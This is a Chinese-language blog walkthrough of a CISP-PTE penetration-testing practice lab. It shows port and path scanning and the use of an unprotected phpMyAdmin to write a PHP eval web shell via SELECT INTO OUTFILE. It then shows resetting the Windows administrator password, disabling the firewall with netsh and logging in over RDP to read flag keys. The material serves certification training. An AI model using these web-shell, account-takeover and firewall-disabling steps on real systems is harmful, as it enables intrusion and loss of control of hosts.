CISP-PTE综合题靶场

CISP-PTE综合题靶场

由于题目中只给了靶机的ip地址,没有给出开放的web端口,需要进行前期的信息收集判断开放的端口服务。

首先使用扫描工具Nmap对靶机IP地址进行端口扫描,开放125端口

接下来访问目标端口http://172.16.12.100:125 ,访问时弹出HTTP Authenrization认证窗口,这里可以对其进行爆破,由于已知账号密码(admin/qwerty)直接登录

登陆成功后进入后台页面,此时我们对该登录后台进行暴力破解或者弱口令登录,未果

尝试对该Web目录进行路径扫描,判断其他存在的Web路径

由上图可得存在rebots.txt路径和news/目录

访问rebots.txt路径返回网站地图和key值{yuio243}

访问news目录,可以看到是个留言反馈系统

我们继续对该目录下的Web路径进行扫描,存在phpmyadmin路径

由于该Phpmyadmin未作认证,直接访问进入

下面我们来观察该数据库中是否存在key值或者修改相关数据库中管理员账号的密码

第二种解法:在phpmyadmin中使用SQ语句写入一句话木马

1
select "<?php @eval($_POST['cmd']);>" into outfile 'c:/wamp/www/shell.php';

写入成功后,我们来访问上传的木马文件,命令执行成功

使用冰蝎进行连接,在网站根目录下存在key.php

读取key.php得到key值{fghj4567}

接下来进行提权,连接目标电脑的远程桌面进行提权,通过命令行可以看出目标主机开启3389端口。

由于我们不知道目标主机的账号密码,我们需要创建或者修改用户管理员administrator的密码进行远程桌面登录。

1
net user administrator Admin12345

防止目标主机开启防火墙后被拦截,关闭其防火墙,判断目标主机操作系统版本来执行相应的命令

1
systeminfo //查看操作系统

目标操作系统为win 2008

1
netsh advfirewall set allprofiles state off//关闭防火墙

然后再命令行中输入mstsc进入远程桌面登录框,输入账号密码administrator/Admin12345

连接远程桌面成功

可以看到key值{zxcvasdf}

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2021-2024 John Doe
  • 访问人数: | 浏览次数:

让我给大家分享喜悦吧!

微信